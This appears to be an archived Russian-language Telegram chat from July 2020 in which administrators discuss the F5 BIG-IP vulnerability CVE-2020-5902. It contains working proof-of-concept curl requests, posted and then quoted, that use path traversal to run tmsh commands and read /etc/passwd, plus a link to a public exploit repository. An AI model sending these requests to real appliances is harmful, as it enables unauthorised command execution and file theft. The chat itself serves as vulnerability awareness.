Size: a a a

2020 July 06

S

Stanislav in uptime.community
CVE-2020-5902 / TMUI RCE vulnerability / F5 BIG-IP RCE

RCE:
curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

Read File:
curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd’

Другие примеры:
https://github.com/yassineaboukir/CVE-2020-5902
источник

VR

Vadim Rybalko in uptime.community
Stanislav
CVE-2020-5902 / TMUI RCE vulnerability / F5 BIG-IP RCE

RCE:
curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

Read File:
curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd’

Другие примеры:
https://github.com/yassineaboukir/CVE-2020-5902
Таки что, эти развлекухи пашут только со стороны порта управления или с портов дата-плана тоже доступны?
источник

S

Stanislav in uptime.community
Вадим, а вы ссылку то в номере CVE нажимали в тексте сообщения? Там все есть.
источник

VR

Vadim Rybalko in uptime.community
Неа, обед дело короткое )
источник

S

Stanislav in uptime.community
Нажмите, не пожалеете
источник

S

Stanislav in uptime.community
В самом начале сообщения
источник

VR

Vadim Rybalko in uptime.community
Настолько эпично? У акционеров F5 с самого начала финансовый год явно не задался...
источник

S

Stanislav in uptime.community
источник

S

Stanislav in uptime.community
источник

S

Stanislav in uptime.community
Vadim Rybalko
Настолько эпично? У акционеров F5 с самого начала финансовый год явно не задался...
Я промолчу
источник

VR

Vadim Rybalko in uptime.community
Вроде как только порт управления подвержен? Никто же в здравоом уме порты управления голой жопой в инет не выставляет...
источник

S

Stanislav in uptime.community
источник

VR

Vadim Rybalko in uptime.community
А я по ссылке на гитхаб читал.
источник

S

Stanislav in uptime.community
Там ДВЕ ссылки в сообщении ))
источник

VR

Vadim Rybalko in uptime.community
Да, уже заметил
источник

S

Stanislav in uptime.community
Одна в начале (официальная), вторая - в конце, для тех кто хочет все сжечь нахер
источник

VR

Vadim Rybalko in uptime.community
Тогда это похоже на багу в каталисте, для самоналивки иоса
источник
2020 July 07

C

Constantine in uptime.community
источник
2020 July 08

S

Stanislav in uptime.community
источник

S

Stanislav in uptime.community
🔥
источник